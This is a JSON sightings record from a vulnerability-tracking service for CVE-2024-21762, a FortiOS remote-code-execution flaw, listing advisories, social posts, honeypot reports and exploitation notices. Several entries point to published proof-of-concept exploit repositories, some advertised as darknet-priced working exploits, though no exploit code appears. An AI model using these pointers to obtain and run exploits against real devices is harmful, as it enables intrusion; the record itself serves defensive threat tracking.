{"vulnerability": "CVE-2024-21762", "sightings": [{"uuid": "f673c5e6-d45f-42c4-97b3-d09a9f8a6deb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-02-09T21:10:03.000000Z"}, {"uuid": "4eee9848-e76d-4d6f-8e2c-114a3eb53778", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "MISP/eb740424-b73f-401b-9b79-f1d5085e106d", "content": "", "creation_timestamp": "2024-02-19T20:40:01.000000Z"}, {"uuid": "d693afb7-be9a-47fa-8538-74db8560ab94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/qiancx.bsky.social/post/3lkrb6pklam2y", "content": "", "creation_timestamp": "2025-03-19T22:46:06.589731Z"}, {"uuid": "96ffc218-a71a-47af-985a-e3b93279ce20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3lkrb6tfv4c2b", "content": "", "creation_timestamp": "2025-03-19T22:46:10.635098Z"}, {"uuid": "5fd9a9ec-989a-4d11-a047-52097e7c9e84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:52.000000Z"}, {"uuid": "d58ec1e7-3b12-4395-9992-181d66e80e6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-21762", "type": "seen", "source": "https://infosec.exchange/users/saltmyhash/statuses/114039171548967342", "content": "", "creation_timestamp": "2025-02-21T01:01:38.862451Z"}, {"uuid": "84072749-808a-429c-9e45-79e48604169d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://thehackernews.com/2025/04/fortinet-warns-attackers-retain.html", "content": "", "creation_timestamp": "2025-04-11T15:55:00.000000Z"}, {"uuid": "2278c556-0e37-4a75-a40c-9175cc455559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lr3hna67i222", "content": "", "creation_timestamp": "2025-06-08T08:39:26.408873Z"}, {"uuid": "99cbf077-0e5c-4734-8831-c4b72cdf7c5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lmm7lumup22a", "content": "", "creation_timestamp": "2025-04-12T09:24:46.623550Z"}, {"uuid": "18149fc6-decb-42f8-9aa4-b2e0bc987704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114500489099801132", "content": "", "creation_timestamp": "2025-05-13T12:20:12.682769Z"}, {"uuid": "3e668cef-1ba8-40c9-b0b7-a5ad23fa0a20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lmp3mxo5nc2f", "content": "", "creation_timestamp": "2025-04-13T12:51:46.027621Z"}, {"uuid": "80e388d8-a3ad-476f-af6c-1d10030ef9f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmp6loq4hk2q", "content": "", "creation_timestamp": "2025-04-13T13:44:46.694274Z"}, {"uuid": "be71c2f9-b762-47d3-8f9a-4ed58a329c0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmp6loqga22q", "content": "", "creation_timestamp": "2025-04-13T13:44:47.728733Z"}, {"uuid": "e7bdfbe1-1a3c-4874-a431-f12cf3a151d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3lmqv7qzhmb2x", "content": "", "creation_timestamp": "2025-04-14T06:02:20.349679Z"}, {"uuid": "bd103be2-89a5-4ac8-8b80-a4f7e271cb7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-21762", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-672871d8-0239cb22accdcf12", "content": "", "creation_timestamp": "2025-04-15T07:59:58.341905Z"}, {"uuid": "d01cb7e4-3545-49e4-8f0e-0c7964ba0001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3lr4y3zergs2a", "content": "", "creation_timestamp": "2025-06-08T23:06:41.954030Z"}, {"uuid": "b65b6e8e-7087-4257-86e1-73c6015fd53a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmy53uo6vs2l", "content": "", "creation_timestamp": "2025-04-17T03:11:58.105709Z"}, {"uuid": "dbc7708e-4b3a-4dc3-9c3c-1d4dac27de0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lnl5jox53f27", "content": "", "creation_timestamp": "2025-04-24T16:40:16.173633Z"}, {"uuid": "d637f819-a213-4003-8f0e-40032c4a0bea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lubkvlwi222a", "content": "", "creation_timestamp": "2025-07-18T23:09:22.864329Z"}, {"uuid": "305c5e6c-f6d9-4e9a-baa4-b07e35739370", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/bilaltariq01.bsky.social/post/3lvo2urdncd2v", "content": "", "creation_timestamp": "2025-08-05T15:52:18.964431Z"}, {"uuid": "d33d581a-08af-4853-ac09-9fafb507cd0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-21762", "type": "seen", "source": "https://www.cert.at/de/warnungen/2024/2/kritische-sicherheitslucken-in-fortinet-fortios-updates-verfugbar", "content": "", "creation_timestamp": "2024-02-09T08:40:20.000000Z"}, {"uuid": "e5435b8b-4635-4de8-998c-7ec72719c9dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "39f4eb5a-d7fd-4f01-95f2-dd6310d643b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lvpvhlt7m22t", "content": "", "creation_timestamp": "2025-08-06T09:20:52.930684Z"}, {"uuid": "ed8a7693-1c56-4ac7-b348-eead13c5bc80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "MISP/abd2a650-703d-4a2f-9f73-3051c1672e27", "content": "", "creation_timestamp": "2025-08-11T18:47:43.000000Z"}, {"uuid": "05373a9b-cca3-4486-a7c6-f3d565d125ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-11)", "content": "", "creation_timestamp": "2025-10-11T00:00:00.000000Z"}, {"uuid": "2d066e29-3d99-4e4c-bd12-5e6288468f8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-10)", "content": "", "creation_timestamp": "2025-10-10T00:00:00.000000Z"}, {"uuid": "d4b34b8d-5108-4550-8579-2c690a3ff3c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/d29dbde5-754c-4ca2-8a8b-47f3b9e077f7", "content": "", "creation_timestamp": "2024-09-24T12:13:05.859516Z"}, {"uuid": "3e6fa6f2-7605-474a-8f58-a3f0fad86d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "MISP/abd2a650-703d-4a2f-9f73-3051c1672e27", "content": "", "creation_timestamp": "2025-08-09T13:26:57.000000Z"}, {"uuid": "cd3b6aeb-4803-4042-b5e9-964c10823213", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3m2mgbvffms2r", "content": "", "creation_timestamp": "2025-10-07T15:17:12.205349Z"}, {"uuid": "38f8b66e-48ad-4ce4-a07f-5e73136433dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3m2mgbxn7i22r", "content": "", "creation_timestamp": "2025-10-07T15:17:12.677067Z"}, {"uuid": "856c1a89-db5b-45bc-9b4b-30a33a986603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3m2mgbxnbgk2r", "content": "", "creation_timestamp": "2025-10-07T15:17:13.133246Z"}, {"uuid": "95ce75c4-fc5c-460f-acbe-62b05b38a313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:12.000000Z"}, {"uuid": "67fb02b9-acac-4dba-b213-188b3d196140", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1225", "content": "", "creation_timestamp": "2024-02-09T04:00:00.000000Z"}, {"uuid": "12452283-70ed-4e39-8aba-4fe08026e132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_8/2024", "content": "", "creation_timestamp": "2024-02-09T10:14:28.000000Z"}, {"uuid": "e015fd73-6f3c-484d-927b-b830beb5d993", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/11268897-8798-4ec2-bcac-b23fe0715823", "content": "", "creation_timestamp": "2025-03-11T20:37:58.600981Z"}, {"uuid": "1adadc2c-3ac2-437a-870e-2e8d579a6015", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13163", "content": "\u2694\ufe0f Two Bytes is Plenty: FortiGate RCE with CVE-2024-21762\n\nhttps://www.assetnote.io/resources/research/two-bytes-is-plenty-fortigate-rce-with-cve-2024-21762", "creation_timestamp": "2024-06-17T15:14:23.000000Z"}, {"uuid": "d3b1958b-40be-4915-8af3-d77564f362d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/5c03b3b9-27ed-409a-b76a-f44da355b955", "content": "", "creation_timestamp": "2026-02-02T12:26:41.619895Z"}, {"uuid": "5f7101ac-d98a-48e1-a1e2-d3bb5bb86610", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/7Ml4_lMheQFWoLP8HS6G4y2kPw4O-CbsZ96PEHQtUpuC3WA", "content": "", "creation_timestamp": "2025-05-04T05:10:20.000000Z"}, {"uuid": "29d7f8bd-51bc-4b87-980f-95418f6bb195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6804", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aout-of-bounds write in Fortinet FortiOS  CVE-2024-21762 vulnerability \nURL\uff1ahttps://github.com/h4x0r-dz/CVE-2024-21762\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-15T20:15:15.000000Z"}, {"uuid": "3b2f1282-f48d-43bd-a8a5-de24057efff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6791", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThe only one working RCE exploit that sells for $5,000 on the darknet\nURL\uff1ahttps://github.com/JohnHormond/CVE-2024-21762-Fortinet-RCE-WORK\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-12T14:41:44.000000Z"}, {"uuid": "bf7ada45-9397-4004-936e-4b173eea9ea7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6790", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThe only one working RCE exploit that sells for $5,000 on the darknet\nURL\uff1ahttps://github.com/JohnHormond/CVE-2024-21762-Fortinet-RCE-WORK-\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-12T14:33:29.000000Z"}, {"uuid": "a9dbfdaf-0db3-402b-ab73-cd4c7dd61d2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6864", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aThe only one working RCE exploit that sells for $1,000 on the darknet\nURL\uff1ahttps://github.com/MrCyberSec/CVE-2024-21762-Fortinet-RCE-ALLWORK\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-03-28T09:53:37.000000Z"}, {"uuid": "41c78295-77e5-4075-b1d4-8ac23481b49d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6780", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRCE exploit for FortiOS 6.0-7.4.2\nURL\uff1ahttps://github.com/c0d3b3af/CVE-2024-21762-RCE-exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-11T12:08:06.000000Z"}, {"uuid": "08c9f73c-1c94-4959-ba22-49f544e0cd22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6778", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-21762 is an out of bounds write vulnerability in fortinet fortios which leads to unauthenticated remote code execution\nURL\uff1ahttps://github.com/t4ril/CVE-2024-21762-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-11T02:36:42.000000Z"}, {"uuid": "44935981-16e4-476b-8179-c31eed487431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/ics_cert/1132", "content": "\u0641\u0648\u0631\u062a\u06cc\u0646\u062a \u0647\u0634\u062f\u0627\u0631 \u0645\u06cc \u062f\u0647\u062f \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 FortiGate \u0631\u0627 \u067e\u0633 \u0627\u0632 \u0648\u0635\u0644\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 SSL-VPN Symlink Exploit \u062d\u0641\u0638 \u0645\u06cc\u06a9\u0646\u0646\u062f.\n\n\u0641\u0648\u0631\u062a\u06cc\u200c\u0646\u062a \u0641\u0627\u0634 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0639\u0648\u0627\u0645\u0644 \u062a\u0647\u062f\u06cc\u062f \u0631\u0627\u0647\u06cc \u0628\u0631\u0627\u06cc \u062d\u0641\u0638 \u062f\u0633\u062a\u0631\u0633\u06cc \u0641\u0642\u0637 \u062e\u0648\u0627\u0646\u062f\u0646\u06cc \u0628\u0647 \u062f\u0633\u062a\u06af\u0627\u0647\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0641\u0648\u0631\u062a\u06cc\u200c\u06af\u06cc\u062a \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u0627\u0635\u0644\u0627\u062d \u0648\u0635\u0644\u0647\u200c\u0628\u0646\u062f\u06cc \u0628\u0631\u062f\u0627\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0648\u0644\u06cc\u0647 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630 \u0628\u0647 \u062f\u0633\u062a\u06af\u0627\u0647\u200c\u0647\u0627\u060c \u067e\u06cc\u062f\u0627 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f.\n\n\u06af\u0645\u0627\u0646 \u0645\u06cc\u200c\u0631\u0648\u062f \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u0632 \u0646\u0642\u0635\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647 \u0648 \u0627\u0635\u0644\u0627\u062d\u200c\u0634\u062f\u0647\u060c \u0627\u0632 \u062c\u0645\u0644\u0647\u060c \u0627\u0645\u0627 \u0646\u0647 \u0645\u062d\u062f\u0648\u062f \u0628\u0647\u060c CVE-2022-42475 \u060c CVE-2023-27997 \u0648 CVE-2024-21762 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f .\n\n\u0634\u0631\u06a9\u062a \u0627\u0645\u0646\u06cc\u062a \u0634\u0628\u06a9\u0647 \u062f\u0631 \u0645\u0634\u0627\u0648\u0631\u0647 \u0627\u06cc \u06a9\u0647 \u0631\u0648\u0632 \u067e\u0646\u062c\u0634\u0646\u0628\u0647 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f \u06af\u0641\u062a : \u00ab\u06cc\u06a9 \u0639\u0627\u0645\u0644 \u062a\u0647\u062f\u06cc\u062f \u0627\u0632 \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u067e\u06cc\u0627\u062f\u0647 \u0633\u0627\u0632\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0641\u0642\u0637 \u062e\u0648\u0627\u0646\u062f\u0646\u06cc \u0628\u0647 \u062f\u0633\u062a\u06af\u0627\u0647 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0641\u0648\u0631\u062a\u06cc \u06af\u06cc\u062a \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f. \"\u0627\u06cc\u0646 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u067e\u06cc\u0648\u0646\u062f \u0646\u0645\u0627\u062f\u06cc\u0646 \u06a9\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0641\u0627\u06cc\u0644 \u06a9\u0627\u0631\u0628\u0631 \u0648 \u0633\u06cc\u0633\u062a\u0645 \u0641\u0627\u06cc\u0644 \u0631\u06cc\u0634\u0647 \u0631\u0627 \u062f\u0631 \u067e\u0648\u0634\u0647 \u0627\u06cc \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0627\u0631\u0627\u0626\u0647 \u0641\u0627\u06cc\u0644 \u0647\u0627\u06cc \u0632\u0628\u0627\u0646 \u0628\u0631\u0627\u06cc SSL-VPN \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u0634\u0648\u062f\u060c \u0628\u0647 \u0647\u0645 \u0645\u062a\u0635\u0644 \u0645\u06cc \u06a9\u0646\u062f.\"\n\n\u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\n\u0641\u0648\u0631\u062a\u06cc \u0646\u062a \u06af\u0641\u062a \u06a9\u0647 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0641\u0627\u06cc\u0644 \u06a9\u0627\u0631\u0628\u0631 \u0627\u0646\u062c\u0627\u0645 \u0634\u062f \u0648 \u0645\u0648\u0641\u0642 \u0634\u062f \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0641\u0631\u0627\u0631 \u06a9\u0646\u062f \u0648 \u0628\u0627\u0639\u062b \u0634\u062f \u06a9\u0647 \u067e\u06cc\u0648\u0646\u062f \u0646\u0645\u0627\u062f\u06cc\u0646 (\u0645\u0639\u0631\u0648\u0641 \u0628\u0647 symlink) \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u0628\u0633\u062a\u0647 \u0634\u062f\u0646 \u062d\u0641\u0631\u0647\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0645\u0633\u0626\u0648\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0648\u0644\u06cc\u0647 \u0628\u0627\u0642\u06cc \u0628\u0645\u0627\u0646\u062f.\n\n\u0627\u06cc\u0646 \u0628\u0647 \u0646\u0648\u0628\u0647 \u062e\u0648\u062f\u060c \u0639\u0627\u0645\u0644\u0627\u0646 \u062a\u0647\u062f\u06cc\u062f \u0631\u0627 \u0642\u0627\u062f\u0631 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u062a\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc \u0641\u0642\u0637 \u062e\u0648\u0627\u0646\u062f\u0646\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0641\u0627\u06cc\u0644 \u062f\u0633\u062a\u06af\u0627\u0647\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a\u060c \u0631\u0627 \u062d\u0641\u0638 \u06a9\u0646\u0646\u062f. \u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0645\u0634\u062a\u0631\u06cc\u0627\u0646\u06cc \u06a9\u0647 \u0647\u0631\u06af\u0632 SSL-VPN \u0631\u0627 \u0641\u0639\u0627\u0644 \u0646\u06a9\u0631\u062f\u0647 \u0627\u0646\u062f \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0627\u06cc\u0646 \u0645\u0634\u06a9\u0644 \u0642\u0631\u0627\u0631 \u0646\u0645\u06cc \u06af\u06cc\u0631\u0646\u062f.\n\n\u0645\u0634\u062e\u0635 \u0646\u06cc\u0633\u062a \u0686\u0647 \u06a9\u0633\u06cc \u067e\u0634\u062a \u0627\u06cc\u0646 \u0641\u0639\u0627\u0644\u06cc\u062a \u0627\u0633\u062a\u060c \u0627\u0645\u0627 \u0641\u0648\u0631\u062a\u06cc \u0646\u062a \u06af\u0641\u062a \u062a\u062d\u0642\u06cc\u0642\u0627\u062a\u0634 \u0646\u0634\u0627\u0646 \u0645\u06cc \u062f\u0647\u062f \u06a9\u0647 \u0647\u062f\u0641 \u0622\u0646 \u0645\u0646\u0637\u0642\u0647 \u06cc\u0627 \u0635\u0646\u0639\u062a \u062e\u0627\u0635\u06cc \u0646\u0628\u0648\u062f\u0647 \u0627\u0633\u062a. \u0647\u0645\u0686\u0646\u06cc\u0646 \u06af\u0641\u062a \u06a9\u0647 \u0645\u0633\u062a\u0642\u06cc\u0645\u0627\u064b \u0628\u0647 \u0645\u0634\u062a\u0631\u06cc\u0627\u0646\u06cc \u06a9\u0647 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 